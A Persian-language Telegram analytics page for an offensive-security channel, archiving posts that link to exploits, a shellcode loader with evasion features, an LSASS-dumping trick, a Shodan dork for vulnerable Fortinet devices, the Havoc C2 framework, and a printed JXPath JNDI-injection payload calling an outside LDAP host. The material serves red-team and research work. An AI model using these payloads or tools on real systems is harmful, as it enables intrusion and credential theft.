fa
Feedback
APT

APT

رفتن به کانال در Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

نمایش بیشتر
روسيا45 631فناوری و برنامه‌ها8 841

📈 تحلیل کانال تلگرام APT

کانال APT (@apt_notes) در بخش زبانی انگلیسی بازیگری فعال است. در حال حاضر جامعه شامل 14 658 مشترک است و جایگاه 8 841 را در دسته فناوری و برنامه‌ها و رتبه 45 631 را در منطقه روسيا دارد.

📊 شاخص‌های مخاطب و پویایی

از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 14 658 مشترک جذب کرده است.

بر اساس آخرین داده‌ها در تاریخ 12 ژوئن, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 406 و در ۲۴ ساعت گذشته برابر 7 بوده و همچنان دسترسی گسترده‌ای حفظ شده است.

  • وضعیت تأیید: تأیید نشده
  • نرخ تعامل (ER): میانگین تعامل مخاطب 49.89% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً N/A% واکنش نسبت به کل مشترکان کسب می‌کند.
  • دسترسی پست‌ها: هر پست به طور میانگین 7 313 بازدید دریافت می‌کند. در اولین روز معمولاً 0 بازدید جمع‌آوری می‌شود.
  • واکنش‌ها و تعامل: مخاطبان به‌طور فعال حمایت می‌کنند؛ میانگین واکنش به هر پست 20 است.

📝 توضیح و سیاست محتوایی

نویسنده این فضا را محل بیان دیدگاه‌های شخصی توصیف می‌کند:
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

به لطف به‌روزرسانی‌های پرتکرار (آخرین داده در تاریخ 13 ژوئن, 2026)، کانال همواره به‌روز و دارای دسترسی بالاست. تحلیل‌ها نشان می‌دهد مخاطبان به‌طور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامه‌ها تبدیل کرده‌اند.

14 658
مشترکین
+724 ساعت
+1007 روز
+40630 روز
آرشیو پست ها
APT
APT
14 658
Repost from Ralf Hacker Channel
Новые сюрпризы в AD CS... Добавим технику ESC11🙈 https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/ #ad #pentest #redteam

APT
APT
14 658
💤 laZzzy This is a shellcode loader, developed using different open-source libraries, that demonstrates different execution
💤 laZzzy This is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques. Features: — Direct syscalls and native functions; — Import Address Table (IAT) evasion; — Encrypted payload (XOR and AES); — PPID spoofing; — Blocking of non-Microsoft-signed DLLs; — etc. https://github.com/capt-meelo/laZzzy #maldev #loader #cpp #redteam

APT
APT
14 658
🥷 PNG Steganography Hides Backdoor Malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, mor
🥷 PNG Steganography Hides Backdoor Malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha). https://decoded.avast.io/martinchlumecky/png-steganography/ #maldev #steganography #png

APT
APT
14 658
🛠 DynamicSyscalls This is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking) https://github.com/Shrfnt77/DynamicSyscalls #maldev #csharp #syscall #library

APT
APT
14 658
Repost from Offensive Xwitter
😈 [ ShitSecure, S3cur3Th1sSh1t ] I really like DeepL for translations. But I also like the fact, that when using the Desktop
😈 [ ShitSecure, S3cur3Th1sSh1t ] I really like DeepL for translations. But I also like the fact, that when using the Desktop APP is makes use of an signed executable named CreateDump.exe in %APPDATA%, which can dump e.g. LSASS 🧐🤩 🐥 [ tweet ]

APT
APT
14 658
⚙️ Psudohash — Password List Generator For Orchestrating Brute Force Attacks This is a password list generator for orchestrat
⚙️ Psudohash — Password List Generator For Orchestrating Brute Force Attacks This is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. https://github.com/t3l3machus/psudohash #wordlist #password #generator #bruteforce

APT
APT
14 658
Bash Aliases for CrackMapExec Modules CrackMapExec has one of the coolest features - "Audit Mode". This features makes life e
Bash Aliases for CrackMapExec Modules CrackMapExec has one of the coolest features - "Audit Mode". This features makes life easier for a pentester by masking the password in the CME output. However, most often a pentester needs this functionality only as a one-time action, take a screenshot and disable it. That's why I wrote a simple Bash Alias that allows you to turn "Audit Mode" on and off with a single command. As a bonus, I've implemented an Alias for the bh_owned module. This can be useful if you haven't received a BloodHound dump yet and a module error is annoys you. Just include these lines in your ~/.zshrc or ~/.bashrc and enjoy. Aliases: alias CMEOwned='awk '\''/bh_enabled/{ if ($3=="False") {$3="True"} else {$3="False"}; {if($3=="True") {print "\033[1;92m" "[+] BloodHound Owned: "$3} else print "\033[1;91m" "[-] BloodHound Owned: "$3}} {print > FILENAME }'\'' /root/.cme/cme.conf' alias CMEAudit='awk '\''/audit_mode/{ if ($3=="") {$3="*"} else {$3=""} {if($3==""){print "\033[1;92m" "[+] Audit Mode: Enable"} else print "\033[1;91m" "[-] Audit Mode: Disable"}} {print > FILENAME }'\'' /root/.cme/cme.conf' #cme #bash #alias #bloodhound #audit #masking

APT
APT
14 658
⚔️ Katana — Web Crawler A next-generation crawling and spidering framework. Features: — Standard/Headless — Customizable Conf
⚔️ Katana — Web Crawler A next-generation crawling and spidering framework. Features: — Standard/Headless — Customizable Config — JavaScript parsing — Scope control https://github.com/projectdiscovery/katana #web #crawler #tools #bugbounty

APT
APT
14 658
Repost from Offensive Xwitter
😈 [ an0n_r0, an0n ] here is the proper way to RC4 encode with OpenSSL compatible with SystemFunction032 (use the raw hex key
😈 [ an0n_r0, an0n ] here is the proper way to RC4 encode with OpenSSL compatible with SystemFunction032 (use the raw hex key instead of passphrase). awesome shellcode exec method from @ShitSecure 👍 https://t.co/renlMV0rsE 🔗 https://s3cur3th1ssh1t.github.io/SystemFunction032_Shellcode/ 🐥 [ tweet ][ quote ]

APT
APT
14 658
🔑 Abuse Kerberos RC4 (CVE-2022-33679) This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnera
🔑 Abuse Kerberos RC4 (CVE-2022-33679) This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnerability works and how to force Kerberos to downgrade the encoding from the default AES encryption to the historical MD4-RC4. The vulnerability could allows an attacker to obtain an authenticated session on behalf of the victim and also lead to arbitrary code execution. Research: https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html Exploit: https://github.com/Bdenneu/CVE-2022-33679 #ad #kerberos #rc4 #exploit

APT
APT
14 658
Repost from Информационная безопасность
Phishing campaigns Сделал github репозиторий, в котором представлены разборы/отчёты об фишинговых кампаниях APT группировок, которые содержат пример писем, с помощью которого осуществлялась рассылка. Зачастую разборы атак APT группировок не содержат примеры писем, это побудило меня создать репозиторий в котором будут отчёты/разборы, которые точно содержат фишинговое письмо. Постепенно данный список будет пополняться Link: https://github.com/wddadk/Phishing-campaigns #apt #git #phishing

APT
APT
14 658
🌀 Unique Subdomain Enumeration Great research regarding subdomain enumeration through permutations, unique approach that can
🌀 Unique Subdomain Enumeration Great research regarding subdomain enumeration through permutations, unique approach that can provide good results with a smaller initial bruteforce data set in comparison to altdns Research: https://cramppet.github.io/regulator/index.html Tools: https://github.com/cramppet/regulator #subdomain #enumeration #permutation #tools

APT
APT
14 658
⚙️ Apache Commons Jxpath (CVE-2022-41852) This vulnerability affects Java library called Apache Commons JXPath, which is used
⚙️ Apache Commons Jxpath (CVE-2022-41852) This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server. Payload: jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")"); PoC: https://github.com/Warxim/CVE-2022-41852 Research: https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/ #apache #commons #jxpath #cve #exploit

APT
APT
14 658
Repost from Offensive Xwitter
😈 [ dafthack, Beau Bullock ] Finding cleartext creds in AD user attributes is something that happens more than most might think. Great demo John! Here's a 1-liner to find these while leveraging PowerView: https://t.co/ZItkN8BjZ9 And here's one for Azure AD: https://t.co/IcCHRYPrE5 🔗 https://gist.github.com/dafthack/5f8c36f7468fad991e9e1f6d81ec29d4 🐥 [ tweet ][ quote ]

APT
APT
14 658
🔑 YubiKeys Relaying Attack That is, the APDU packets that the server application wants to get signed by a private key to verify the identity of the authentication. This attack works on all PIV Smart Cards. Research: Relaying YubiKeys Part 1 Relaying YubiKeys Part 2 Tools: https://github.com/cube0x0/YubiKey-Relay #ad #2fa #fido2 #ybikeys

APT
APT
14 658
📄 Detecting ADCS Web Services Abuse (ESC8) One of the popular attack vectors against Active Directory Certificate Services is ESC8. This article covers detecting irregular access to some ADCS web services exposed, as well as detecting the NTLM relaying itself. https://medium.com/falconforce/falconfriday-detecting-adcs-web-services-abuse-0xff20-9f660c83cb36 #adcs #detection #esc8 #blueteam

APT
APT
14 658
Attacking Predictable GUID Few penetration testers and bug bounty hunters are aware of the different versions of GUIDs and the security issues associated with using the wrong one. In this blog post walk through an account takeover issue from a recent penetration test where GUIDs were used as password reset tokens. https://www.intruder.io/research/in-guid-we-trust #web #pentest #guid #account #takeover

APT
APT
14 658
😈 Fortinet RCE (CVE-2022-40684) Fortinet recently patched a critical authentication bypass vulnerability in their FortiOS, FortiProxy, and FortiSwitchManager projects (CVE-2022-40684). This vulnerability gives an attacker the ability to login as an administrator on the affected system. Shodan Dork: product:"Fortinet FortiGate" Research: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/ PoC: https://github.com/NagliNagli/BountyTricks/blob/main/CVE-2022-40684.yaml Exploit: https://github.com/horizon3ai/CVE-2022-40684 Detection for SOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ #fortinet #rce #research #poc #exploit

APT
APT
14 658
Repost from Offensive Xwitter
😈 [ pdiscoveryio, ProjectDiscovery.io ] The Ultimate Guide to Finding Bugs With Nuclei by @v3natoris https://t.co/2GY3QZlTft #hackwithautomation #cybersecurity #infosec #bugbounty 🔗 https://blog.projectdiscovery.io/ultimate-nuclei-guide/ 🐥 [ tweet ]

APT
APT
14 658
Repost from 1N73LL1G3NC3
Havoc is a modern and malleable post-exploitation command and control framework Features: Client - Modern, dark theme based o
Havoc is a modern and malleable post-exploitation command and control framework Features: Client - Modern, dark theme based on Dracula Teamserver - Multiplayer - Payload generation (exe/shellcode/dll) - HTTP/HTTPS listeners - Customizable C2 profiles - External C2 Demon - Sleep Obfuscation via Ekko or FOLIAGE - x64 return address spoofing - Indirect Syscalls for Nt* APIs - SMB support - Token vault - Variety of built-in post-exploitation commands